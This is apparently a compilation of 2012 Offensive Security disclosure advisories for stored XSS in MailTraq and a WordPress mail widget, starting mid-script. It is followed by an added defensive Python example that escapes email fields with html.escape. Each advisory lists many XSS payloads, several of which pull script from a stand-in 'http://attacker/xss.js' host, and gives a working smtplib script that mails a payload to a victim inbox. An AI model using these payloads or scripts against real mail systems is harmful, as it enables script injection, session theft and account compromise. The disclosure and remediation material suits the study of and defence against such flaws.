        server.sendmail(frmemail, dstemail, msg)
    except Exception as e:
        print("[-] Failed to send email:")
        print("[*] " + str(e))
    server.quit()


username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.84.171"

print("[*] Sending Email")
sendMail(dstemail, frmemail, smtpsrv, username, password)

Source
-
MailTraq 2.17.3.3150 Stored XSS

EDB-ID: 20358 | CVE: 2012-2586 | OSVDB-ID: N/A
Author: loneferret | Published: 2012-08-08 | Vulnerable App: N/A

#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: MailTraq
Version: 2.17.3.3150 (Mar 5th, 2012)
Vendor Site: http://www.mailtraq.com/
Software Download: http://www.mailtraq.com/30day

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Windows 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9

Injection Point: Subject
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
2: <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--
3: </TITLE><SCRIPT>alert("XSS");</SCRIPT>

Injection Point: Body
Injection Payload(s):
1: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
2: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
3: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

Injection Point: Date
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
2: <SCRIPT>alert('XSS')</SCRIPT>
3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5: <DIV STYLE="width: expression(alert('XSS'));">
6: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
7: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
8: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
9: <XSS STYLE="xss:expression(alert('XSS'))">
10: <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--
11: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT>
12: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
13: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
14: <SCRIPT SRC=//attacker/.j>
15: <<SCRIPT>alert("XSS");//<</SCRIPT>
16: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
17: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
18: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
19: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT>
20: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT>
21: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT>
22: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>
'''

import smtplib

payload = """</TITLE><SCRIPT>alert("XSS");</SCRIPT>"""


def sendMail(dstemail, frmemail, smtpsrv, username, password):
    # The payload is appended to the Subject header, the first injection point listed above.
    msg = "From: hacker@offsec.local\n"
    msg += "To: victim@victim.local\n"
    msg += 'Date: Today\r\n'
    msg += "Subject: XSS" + payload + "\n"
    msg += "Content-type: text/html\n\n"
    msg += "XSS.\r\n\r\n"
    server = smtplib.SMTP(smtpsrv)
    server.login(username, password)
    try:
        server.sendmail(frmemail, dstemail, msg)
    except Exception as e:
        print("[-] Failed to send email:")
        print("[*] " + str(e))
    server.quit()


username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.84.171"

print("[*] Sending Email")
sendMail(dstemail, frmemail, smtpsrv, username, password)

Source
-
Wordpress Mini Mail Dashboard Widget 1.42 Stored XSS

EDB-ID: 20358 | CVE: 2012-2583 | OSVDB-ID: N/A
Author: loneferret | Published: 2012-08-08 | Vulnerable App: N/A

#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: Mini Mail Dashboard Widget
Version: 1.42
Software Download: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
14 Jul 2012: Version 1.43 released
08 Aug 2012: Public Disclosure

Installed On: Ubuntu Server LAMP 8.04
Wordpress: 3.3.1
Client Test OS: Windows XP Pro SP3 (x86)
Browser Used: Internet Explorer 8

Extra note: To execute the XSS, a user needs to click 'view in HTML'

Injection Point: Body
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
2: <SCRIPT>alert('XSS')</SCRIPT>
3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5: <DIV STYLE="width: expression(alert('XSS'));">
6: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
7: exp/*<XSS STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
9: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
10: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
11: <XSS STYLE="xss:expression(alert('XSS'))">
12: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
13: <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
14: <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--
15: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT>
16: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
17: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
18: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
19: <<SCRIPT>alert("XSS");//<</SCRIPT>
20: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
21: <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
22: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
23: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
24: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT>
25: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT>
26: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT>
27: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT>
28: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>
'''

import smtplib

payload = """<SCRIPT>alert('XSS')</SCRIPT>"""


def sendMail(dstemail, frmemail, smtpsrv, username, password):
    # The payload goes into the message body, the injection point listed above.
    msg = "From: hacker@offsec.local\n"
    msg += "To: victim@victim.local\n"
    msg += 'Date: Today\r\n'
    msg += "Subject: XSS\n"
    msg += "Content-type: text/html\n\n"
    msg += "XSS" + payload + "\r\n\r\n"
    server = smtplib.SMTP(smtpsrv)
    server.login(username, password)
    try:
        server.sendmail(frmemail, dstemail, msg)
    except Exception as e:
        print("[-] Failed to send email:")
        print("[*] " + str(e))
    server.quit()


username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.84.171"

print("[*] Sending Email")
sendMail(dstemail, frmemail, smtpsrv, username, password)

Source
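The three loneferret advisories above (SimpleMail, MailTraq, Mini Mail Dashboard Widget) share one root cause: the web front end of a mail client writes attacker-supplied header values and body text straight into its own HTML, so whatever arrives over SMTP executes in the reader's browser. As an added example that is not part of any of those advisories or products, the Python 3 script below parses a constructed message carrying the same kind of payloads (From, Subject and body injected, as the scripts above do) with the standard `email` module and renders it two ways: the way the vulnerable products did, and with every attacker-controlled string passed through `html.escape()` before it lands in the page. The mailbox template, the message contents and the `contains_active_markup()` helper are assumptions made for the demonstration.

```python
import html
from email import message_from_string

# Constructed raw message (not from the advisories) carrying the same kind of
# payloads their scripts inject into the From, Subject and body fields.
RAW_MESSAGE = (
    "From: hacker@offsec.local<SCRIPT>alert('XSS')</SCRIPT>\r\n"
    "To: victim@victim.local\r\n"
    "Date: Today\r\n"
    'Subject: XSS</TITLE><SCRIPT>alert("XSS");</SCRIPT>\r\n'
    "Content-type: text/html\r\n"
    "\r\n"
    "XSS<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\r\n"
)

# Header fields the (assumed) inbox template displays.
FIELDS = ("From", "To", "Date", "Subject")

# The only tags the template itself emits; anything else in the output came from the mail.
TEMPLATE_TAGS = ("<title>", "</title>", "<td>", "</td>", "<div>", "</div>")


def render_unsafe(raw):
    """Builds the inbox view the way the vulnerable products did: header values
    and body are dropped into the page markup untouched."""
    msg = message_from_string(raw)
    parts = ["<title>%s</title>" % msg.get("Subject", "")]
    parts += ["<td>%s</td>" % msg.get(name, "") for name in FIELDS]
    parts.append("<div>%s</div>" % msg.get_payload())
    return "".join(parts)


def render_safe(raw):
    """Same view, but every attacker-controlled string is HTML-escaped before it
    is placed in element content (quote=True also covers attribute contexts)."""
    msg = message_from_string(raw)
    parts = ["<title>%s</title>" % html.escape(msg.get("Subject", ""), quote=True)]
    parts += ["<td>%s</td>" % html.escape(msg.get(name, ""), quote=True) for name in FIELDS]
    # A text/html body is shown as escaped text here. A client that must render
    # HTML mail needs an allow-list sanitizer instead; escaping is the safe default.
    parts.append("<div>%s</div>" % html.escape(msg.get_payload(), quote=True))
    return "".join(parts)


def contains_active_markup(rendered):
    """Crude check: does any '<' or '>' survive in the output once the template's
    own tags are removed? If so, mail content reached the page as markup."""
    stripped = rendered
    for tag in TEMPLATE_TAGS:
        stripped = stripped.replace(tag, "")
    return "<" in stripped or ">" in stripped


if __name__ == "__main__":
    print("unsafe:", render_unsafe(RAW_MESSAGE))
    print("safe  :", render_safe(RAW_MESSAGE))
    print("unsafe output carries mail markup:", contains_active_markup(render_unsafe(RAW_MESSAGE)))
    print("safe output carries mail markup  :", contains_active_markup(render_safe(RAW_MESSAGE)))
```

The point of the split is where the escaping happens: at the moment the value is written into HTML, not when the message is received or stored. Escaping on receipt is what leaves gaps like the Mini Mail "view in HTML" path, where a second code path renders the stored value without the protection the first one applied.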